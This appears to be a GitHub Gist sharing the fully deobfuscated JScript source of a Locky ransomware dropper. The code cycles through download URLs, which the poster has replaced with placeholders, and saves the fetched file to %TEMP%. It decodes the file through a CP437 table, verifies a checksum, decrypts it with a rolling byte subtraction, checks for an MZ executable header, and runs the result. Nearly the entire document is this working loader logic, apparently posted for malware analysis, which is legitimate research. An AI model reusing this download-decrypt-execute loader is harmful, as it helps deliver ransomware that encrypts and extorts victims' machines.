Instantly share code, notes, and snippets.

Embed
What would you like to do?
Locky dropper : file fully unobfuscated
<job><script language="JScript">
var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe";
// URLs have been, obviously, changed
var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"];
var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"];
for(var i=0;i<http_methods["length"];i++){
try{
var download_payload = WScript["CreateObject"](http_methods[i]);
break;
}catch(e){
continue;
}
};
var continuer = 1;
var j = 0;
while(continuer){
try{
if(1 == continuer){
if(j >= urls["length"]){
j = 0;
WScript["Sleep"](1000);
}
download_payload["open"]("GET", urls[j++ % urls["length"]], false);
download_payload["send"]();
}
if(download_payload.readystate < 4){
WScript["Sleep"](100);
continue;
}
var payload_file = WScript["CreateObject"]("ADODB.Stream");
payload_file["open"]();
payload_file["type"] = 1;
payload_file["write"](download_payload["ResponseBody"]);
payload_file["position"] = 0;
payload_file["SaveToFile"](payload_path, 2);
payload_file["close"]();
var payload_content = read_payload(payload_path);
payload_content = decrypt_payload(payload_content);
if(payload_content["length"] < 102400 || payload_content["length"] > 235520 || !check_header(payload_content)){
continuer = 1;
continue;
}
try{
save_decrypted_payload(payload_path, payload_content);
}catch(e){
break;
};
WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321");
}catch(e){
WScript["Sleep"](1000);
continue;
}
}
// LYUo
function read_payload(arg){
var Vt = WScript["CreateObject"]("ADODB.Stream");
Vt["type"]=2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["LoadFromFile"](arg);
var k = Vt["ReadText"];
Vt["close"]();
return decode(k);
}
// NDn2
function decode(arg){
var HOAt1 = new Array();
HOAt1[0xC7]=0x80;
HOAt1[0xFC]=0x81;
HOAt1[0xE9]=0x82;
HOAt1[0xE2]=0x83;
HOAt1[0xE4]=0x84;
HOAt1[0xE0]=0x85;
HOAt1[0xE5]=0x86;
HOAt1[0xE7]=0x87;
HOAt1[0xEA]=0x88;
HOAt1[0xEB]=0x89;
HOAt1[0xE8]=0x8A;
HOAt1[0xEF]=0x8B;
HOAt1[0xEE]=0x8C;
HOAt1[0xEC]=0x8D;
HOAt1[0xC4]=0x8E;
HOAt1[0xC5]=0x8F;
HOAt1[0xC9]=0x90;
HOAt1[0xE6]=0x91;
HOAt1[0xC6]=0x92;
HOAt1[0xF4]=0x93;
HOAt1[0xF6]=0x94;
HOAt1[0xF2]=0x95;
HOAt1[0xFB]=0x96;
HOAt1[0xF9]=0x97;
HOAt1[0xFF]=0x98;
HOAt1[0xD6]=0x99;
HOAt1[0xDC]=0x9A;
HOAt1[0xA2]=0x9B;
HOAt1[0xA3]=0x9C;
HOAt1[0xA5]=0x9D;
HOAt1[0x20A7]=0x9E;
HOAt1[0x192]=0x9F;
HOAt1[0xE1]=0xA0;
HOAt1[0xED]=0xA1;
HOAt1[0xF3]=0xA2;
HOAt1[0xFA]=0xA3;
HOAt1[0xF1]=0xA4;
HOAt1[0xD1]=0xA5;
HOAt1[0xAA]=0xA6;
HOAt1[0xBA]=0xA7;
HOAt1[0xBF]=0xA8;
HOAt1[0x2310]=0xA9;
HOAt1[0xAC]=0xAA;
HOAt1[0xBD]=0xAB;
HOAt1[0xBC]=0xAC;
HOAt1[0xA1]=0xAD;
HOAt1[0xAB]=0xAE;
HOAt1[0xBB]=0xAF;
HOAt1[0x2591]=0xB0;
HOAt1[0x2592]=0xB1;
HOAt1[0x2593]=0xB2;
HOAt1[0x2502]=0xB3;
HOAt1[0x2524]=0xB4;
HOAt1[0x2561]=0xB5;
HOAt1[0x2562]=0xB6;
HOAt1[0x2556]=0xB7;
HOAt1[0x2555]=0xB8;
HOAt1[0x2563]=0xB9;
HOAt1[0x2551]=0xBA;
HOAt1[0x2557]=0xBB;
HOAt1[0x255D]=0xBC;
HOAt1[0x255C]=0xBD;
HOAt1[0x255B]=0xBE;
HOAt1[0x2510]=0xBF;
HOAt1[0x2514]=0xC0;
HOAt1[0x2534]=0xC1;
HOAt1[0x252C]=0xC2;
HOAt1[0x251C]=0xC3;
HOAt1[0x2500]=0xC4;
HOAt1[0x253C]=0xC5;
HOAt1[0x255E]=0xC6;
HOAt1[0x255F]=0xC7;
HOAt1[0x255A]=0xC8;
HOAt1[0x2554]=0xC9;
HOAt1[0x2569]=0xCA;
HOAt1[0x2566]=0xCB;
HOAt1[0x2560]=0xCC;
HOAt1[0x2550]=0xCD;
HOAt1[0x256C]=0xCE;
HOAt1[0x2567]=0xCF;
HOAt1[0x2568]=0xD0;
HOAt1[0x2564]=0xD1;
HOAt1[0x2565]=0xD2;
HOAt1[0x2559]=0xD3;
HOAt1[0x2558]=0xD4;
HOAt1[0x2552]=0xD5;
HOAt1[0x2553]=0xD6;
HOAt1[0x256B]=0xD7;
HOAt1[0x256A]=0xD8;
HOAt1[0x2518]=0xD9;
HOAt1[0x250C]=0xDA;
HOAt1[0x2588]=0xDB;
HOAt1[0x2584]=0xDC;
HOAt1[0x258C]=0xDD;
HOAt1[0x2590]=0xDE;
HOAt1[0x2580]=0xDF;
HOAt1[0x3B1]=0xE0;
HOAt1[0xDF]=0xE1;
HOAt1[0x393]=0xE2;
HOAt1[0x3C0]=0xE3;
HOAt1[0x3A3]=0xE4;
HOAt1[0x3C3]=0xE5;
HOAt1[0xB5]=0xE6;
HOAt1[0x3C4]=0xE7;
HOAt1[0x3A6]=0xE8;
HOAt1[0x398]=0xE9;
HOAt1[0x3A9]=0xEA;
HOAt1[0x3B4]=0xEB;
HOAt1[0x221E]=0xEC;
HOAt1[0x3C6]=0xED;
HOAt1[0x3B5]=0xEE;
HOAt1[0x2229]=0xEF;
HOAt1[0x2261]=0xF0;
HOAt1[0xB1]=0xF1;
HOAt1[0x2265]=0xF2;
HOAt1[0x2264]=0xF3;
HOAt1[0x2320]=0xF4;
HOAt1[0x2321]=0xF5;
HOAt1[0xF7]=0xF6;
HOAt1[0x2248]=0xF7;
HOAt1[0xB0]=0xF8;
HOAt1[0x2219]=0xF9;
HOAt1[0xB7]=0xFA;
HOAt1[0x221A]=0xFB;
HOAt1[0x207F]=0xFC;
HOAt1[0xB2]=0xFD;
HOAt1[0x25A0]=0xFE;
HOAt1[0xA0]=0xFF;
var arr2 = new Array();
for(var i = 0;i<arg["length"];i++){
var var2 = arg["charCodeAt"](i);
if(var2 < 128){
var var3 = var2;
}else{
var var3 = HOAt1[var2];
}
arr2["push"](var3);
};
return arr2;
};
// DTx
function decrypt_payload(arg){
var v1;
var v2 = arg[arg["length"]-4] | arg[arg["length"]-3] << 8 | arg[arg["length"]-2] << (-522 + 538) | arg[arg["length"]-1] << 24;
arg["splice"](arg["length"]-4, 4);
v1 = 40;
for(var i=0;i<arg["length"];i++){
v1 = (v1 + arg[i]) % 0x100000000;
};
if(v1 != v2){
return [];
}
v3 = 30;
arg = arg.reverse();
for(var i = 0; i < arg["length"];i++){
var v4 = arg[i] - v3;
if(v4 < 0){
v4 += 0x100;
}
arg[i] = v4;
v3 = (v3 + 55) % 256;
}
return arg;
}
// Xu9
function check_header(arg){
if(arg[0] == 0x4D && arg[1] == 0x5a){
return true;
}else{
return false;
}
}
// QMg4
function encode(arg){
var BCm=new Array();
BCm[0x80]=0x00C7;
BCm[0x81]=0x00FC;
BCm[0x82]=0x00E9;
BCm[0x83]=0x00E2;
BCm[0x84]=0x00E4;
BCm[0x85]=0x00E0;
BCm[0x86]=0x00E5;
BCm[0x87]=0x00E7;
BCm[0x88]=0x00EA;
BCm[0x89]=0x00EB;
BCm[0x8A]=0x00E8;
BCm[0x8B]=0x00EF;
BCm[0x8C]=0x00EE;
BCm[0x8D]=0x00EC;
BCm[0x8E]=0x00C4;
BCm[0x8F]=0x00C5;
BCm[0x90]=0x00C9;
BCm[0x91]=0x00E6;
BCm[0x92]=0x00C6;
BCm[0x93]=0x00F4;
BCm[0x94]=0x00F6;
BCm[0x95]=0x00F2;
BCm[0x96]=0x00FB;
BCm[0x97]=0x00F9;
BCm[0x98]=0x00FF;
BCm[0x99]=0x00D6;
BCm[0x9A]=0x00DC;
BCm[0x9B]=0x00A2;
BCm[0x9C]=0x00A3;
BCm[0x9D]=0x00A5;
BCm[0x9E]=0x20A7;
BCm[0x9F]=0x0192;
BCm[0xA0]=0x00E1;
BCm[0xA1]=0x00ED;
BCm[0xA2]=0x00F3;
BCm[0xA3]=0x00FA;
BCm[0xA4]=0x00F1;
BCm[0xA5]=0x00D1;
BCm[0xA6]=0x00AA;
BCm[0xA7]=0x00BA;
BCm[0xA8]=0x00BF;
BCm[0xA9]=0x2310;
BCm[0xAA]=0x00AC;
BCm[0xAB]=0x00BD;
BCm[0xAC]=0x00BC;
BCm[0xAD]=0x00A1;
BCm[0xAE]=0x00AB;
BCm[0xAF]=0x00BB;
BCm[0xB0]=0x2591;
BCm[0xB1]=0x2592;
BCm[0xB2]=0x2593;
BCm[0xB3]=0x2502;
BCm[0xB4]=0x2524;
BCm[0xB5]=0x2561;
BCm[0xB6]=0x2562;
BCm[0xB7]=0x2556;
BCm[0xB8]=0x2555;
BCm[0xB9]=0x2563;
BCm[0xBA]=0x2551;
BCm[0xBB]=0x2557;
BCm[0xBC]=0x255D;
BCm[0xBD]=0x255C;
BCm[0xBE]=0x255B;
BCm[0xBF]=0x2510;
BCm[0xC0]=0x2514;
BCm[0xC1]=0x2534;
BCm[0xC2]=0x252C;
BCm[0xC3]=0x251C;
BCm[0xC4]=0x2500;
BCm[0xC5]=0x253C;
BCm[0xC6]=0x255E;
BCm[0xC7]=0x255F;
BCm[0xC8]=0x255A;
BCm[0xC9]=0x2554;
BCm[0xCA]=0x2569;
BCm[0xCB]=0x2566;
BCm[0xCC]=0x2560;
BCm[0xCD]=0x2550;
BCm[0xCE]=0x256C;
BCm[0xCF]=0x2567;
BCm[0xD0]=0x2568;
BCm[0xD1]=0x2564;
BCm[0xD2]=0x2565;
BCm[0xD3]=0x2559;
BCm[0xD4]=0x2558;
BCm[0xD5]=0x2552;
BCm[0xD6]=0x2553;
BCm[0xD7]=0x256B;
BCm[0xD8]=0x256A;
BCm[0xD9]=0x2518;
BCm[0xDA]=0x250C;
BCm[0xDB]=0x2588;
BCm[0xDC]=0x2584;
BCm[0xDD]=0x258C;
BCm[0xDE]=0x2590;
BCm[0xDF]=0x2580;
BCm[0xE0]=0x03B1;
BCm[0xE1]=0x00DF;
BCm[0xE2]=0x0393;
BCm[0xE3]=0x03C0;
BCm[0xE4]=0x03A3;
BCm[0xE5]=0x03C3;
BCm[0xE6]=0x00B5;
BCm[0xE7]=0x03C4;
BCm[0xE8]=0x03A6;
BCm[0xE9]=0x0398;
BCm[0xEA]=0x03A9;
BCm[0xEB]=0x03B4;
BCm[0xEC]=0x221E;
BCm[0xED]=0x03C6;
BCm[0xEE]=0x03B5;
BCm[0xEF]=0x2229;
BCm[0xF0]=0x2261;
BCm[0xF1]=0x00B1;
BCm[0xF2]=0x2265;
BCm[0xF3]=0x2264;
BCm[0xF4]=0x2320;
BCm[0xF5]=0x2321;
BCm[0xF6]=0x00F7;
BCm[0xF7]=0x2248;
BCm[0xF8]=0x00B0;
BCm[0xF9]=0x2219;
BCm[0xFA]=0x00B7;
BCm[0xFB]=0x221A;
BCm[0xFC]=0x207F;
BCm[0xFD]=0x00B2;
BCm[0xFE]=0x25A0;
BCm[0xFF]=0x00A0;
var arr2 = new Array();
var v1 = "";
var v2;
var v3;
for(var i=0;i<arg["length"];i++){
v2 = arg[i];
if(v2 < 128){
v3 = v2;
}else{
v3 = BCm[v2];
}
arr2.push(String["fromCharCode"](v3));
}
v1 = arr2["join"]("");
return v1;
}
// LTs7
function save_decrypted_payload(payload_path, payload_content){
var Vt = WScript["CreateObject"]("ADODB.Stream");
Vt["type"] = 2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["writeText"](encode(payload_content));
Vt["SaveToFile"](payload_path, 2);
Vt["close"]();
};
</script></job>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment